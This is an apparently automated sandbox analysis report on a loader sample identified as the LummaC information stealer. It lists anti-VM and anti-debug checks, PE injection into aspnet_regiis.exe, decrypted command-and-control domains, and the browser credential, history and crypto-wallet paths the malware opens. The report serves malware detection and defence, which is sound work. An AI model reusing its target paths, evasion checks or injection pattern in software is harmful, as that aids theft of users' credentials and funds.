                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AntiVM3
                          Source: Yara matchFile source: Process Memory Space: R3nz_Loader.exe PID: 2684, type: MEMORYSTR
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                          Query firmware table information (likely to detect VMs)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory allocated: 11F0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory allocated: 4D70000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory allocated: 5460000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory allocated: 6460000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory allocated: 6590000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory allocated: 7590000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory allocated: 79E0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory allocated: 89E0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory allocated: 99E0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWindow / User API: threadDelayed 6825Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 4508Thread sleep time: -210000s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7268Thread sleep count: 6825 > 30Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeLast function: Thread delayed
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEF4322 FindFirstFileExW,0_2_6CEF4322
                          Source: Amcache.hve.6.drBinary or memory string: VMware
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                          Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0f
                          Source: aspnet_regiis.exe, 00000003.00000002.3271368717.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2141165577.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2740576821.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2741053262.0000000002AAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                          Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                          Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                          Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                          Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                          Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                          Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                          Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                          Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                          Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                          Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                          Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                          Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                          Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                          Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                          Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-14378
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279CCA0 LdrInitializeThunk,3_2_0279CCA0
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEF3C6A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CEF3C6A
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEF3C39 mov eax, dword ptr fs:[00000030h]0_2_6CEF3C39
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEF2A65 mov eax, dword ptr fs:[00000030h]0_2_6CEF2A65
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEF584C GetProcessHeap,0_2_6CEF584C
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEF3C6A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CEF3C6A
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEF12DA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CEF12DA
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEF0E01 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CEF0E01
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Allocates memory in foreign processes
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2760000 protect: page execute and read and writeJump to behavior
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2760000 value starts with: 4D5AJump to behavior
                          LummaC encrypted strings found
                          Source: R3nz_Loader.exeString found in binary or memory: rabidcowse.shop
                          Source: R3nz_Loader.exeString found in binary or memory: cloudewahsj.shop
                          Source: R3nz_Loader.exeString found in binary or memory: tirepublicerj.shop
                          Source: R3nz_Loader.exeString found in binary or memory: noisycuttej.shop
                          Source: R3nz_Loader.exeString found in binary or memory: wholersorie.shop
                          Source: R3nz_Loader.exeString found in binary or memory: framekgirus.shop
                          Source: R3nz_Loader.exeString found in binary or memory: nearycrepso.shop
                          Source: R3nz_Loader.exeString found in binary or memory: abruptyopsn.shop
                          Source: R3nz_Loader.exeString found in binary or memory: fancywaxxers.shop
                          Writes to foreign memory regions
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2760000Jump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2761000Jump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27A1000Jump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27A4000Jump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27B2000Jump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2761000Jump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27A1000Jump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27A4000Jump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27B2000Jump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2517008Jump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEF14A8 cpuid 0_2_6CEF14A8
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeQueries volume information: C:\Users\user\Desktop\R3nz_Loader.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEF0F23 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CEF0F23
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: aspnet_regiis.exe, 00000003.00000002.3271368717.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2100987956.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2141165577.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2740576821.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2101077815.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2741053262.0000000002AAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5780, type: MEMORYSTR
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.2760000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.R3nz_Loader.exe.6cf01000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.R3nz_Loader.exe.6cf01000.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.R3nz_Loader.exe.6cee0000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.R3nz_Loader.exe.a10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: aspnet_regiis.exe, 00000003.00000002.3271368717.0000000002AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                          Source: aspnet_regiis.exe, 00000003.00000002.3271300259.0000000002A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                          Source: aspnet_regiis.exe, 00000003.00000003.2085718516.0000000002B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                          Source: aspnet_regiis.exe, 00000003.00000002.3271368717.0000000002AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                          Source: aspnet_regiis.exe, 00000003.00000003.2082382204.0000000002AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                          Source: aspnet_regiis.exe, 00000003.00000003.2085741013.0000000002AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                          Source: aspnet_regiis.exe, 00000003.00000002.3271368717.0000000002AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                          Source: aspnet_regiis.exe, 00000003.00000003.2085718516.0000000002B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                          Source: aspnet_regiis.exe, 00000003.00000003.2085741013.0000000002AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
